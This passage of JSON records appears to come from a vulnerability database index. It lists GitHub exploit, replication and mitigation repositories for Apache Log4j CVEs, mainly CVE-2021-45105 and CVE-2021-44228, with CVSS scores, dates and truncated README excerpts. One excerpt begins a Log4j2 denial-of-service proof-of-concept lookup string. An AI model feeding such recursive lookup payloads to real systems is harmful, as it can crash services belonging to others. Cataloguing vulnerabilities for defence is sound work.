["CVE-2021-45105"], "modified": "2021-12-20T21:41:10", "id": "AFC5A984-3296-5D6A-AE73-0771AF4EDAF6", "href": "", "cvss": {"score": 0.0, "vector": "NONE"}, "privateArea": 1}, {"lastseen": "2022-04-20T09:12:26", "description": "sakuraji_log4j\n\nThis tool is used to discover and remedidate the...", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-23T21:45:42", "type": "githubexploit", "title": "Exploit for Uncontrolled Recursion in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2021-12-28T20:16:33", "id": "88F20430-F65B-520C-880E-FB9413D8C14F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-20T09:12:14", "description": "sakuraji_log4j\n\nThis tool is used to discover and remedidate the...", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-23T21:45:42", "type": "githubexploit", "title": "Exploit for Uncontrolled Recursion in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2021-12-28T20:16:33", "id": "4DC6D6A4-F23D-5A3D-98B8-3BB526D28144", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-20T09:15:04", "description": "# tejas-nagchandi/CVE-2021-45105\nReplicating CVE-2021-45105\n\n## ...", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-19T23:22:25", "type": "githubexploit", "title": "Exploit for Uncontrolled Recursion in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2021-12-19T23:50:00", "id": "E1FC5745-FCD7-58AF-9F4D-65D94090BBAB", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-20T09:16:13", "description": "# Log4j2 DOS (CVE-2021-45105) \n\n## Poc\n\n```\n${${::-${::-$${::-$}...", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-18T12:54:44", "type": "githubexploit", "title": "Exploit for Uncontrolled Recursion in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-02-24T20:41:41", "id": "7C8BD924-02A0-5873-B8AF-445DE0103959", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-20T09:16:47", "description": "# \u8bf4\u660e about\n\n author: \u6211\u8d85\u6015\u7684\n\n blog: https://www.cnblogs.com/iAmSoS...", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-20T10:52:20", "type": "githubexploit", "title": "Exploit for Uncontrolled Recursion in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2022-03-30T10:13:10", "id": "59A6FBED-4F3E-5B1E-87FF-E637492A268A", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "privateArea": 1}, {"lastseen": "2022-04-20T09:14:25", "description": "# Sample Log4j2 vulnerable application (CVE-2021-45105) \n# Versi...", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 5.9, "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2021-12-23T17:46:02", "type": "githubexploit", "title": "Exploit for Uncontrolled Recursion in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "PARTIAL", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45105"], "modified": "2021-12-23T17:46:14", "id": "3D2CC855-C8BA-5DC6-8C78-D67984FBA93F", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:N/A:P"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:34:22", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "DECBAC7B-9235-5E00-81C1-142CD41306FB", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:38", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "2AF7350D-AB79-5AB5-8AF9-0F351CE13D30", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:45:43", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "342CC1B7-6E24-5767-A7B1-90B95A91B503", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2022-02-13T15:38:51", "description": "# Log4J-Mitigation-[CVE-2021-44228](https://cve.mitre.org/cgi-bi...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:24:02", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-4104", "CVE-2021-44832", "CVE-2021-44228", "CVE-2021-45046", "CVE-2021-45105"], "modified": "2022-02-13T14:43:09", "id": "C76F7089-967B-5A7F-B8DA-629452876A2A", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateArea": 1}, {"lastseen": "2021-12-20T02:11:24", "description": "# S\u00e5rbarheter i Log4j\n\nOppdatering 19.12.2021: Det oppdages stad...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-12-13T07:48:49", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Apache Log4J", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-45046", "CVE-2021-45105", "CVE-2021-4104", "CVE-2021-44228", "CVE-2019-17571"], "modified": "2021-12-19T23:28:13", "id": "3DFE8091-03AE-565B-A198-BD509784502C", "href": "", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "privateA
Exploit for Deserialization of Untrusted Data in Apache Log4J
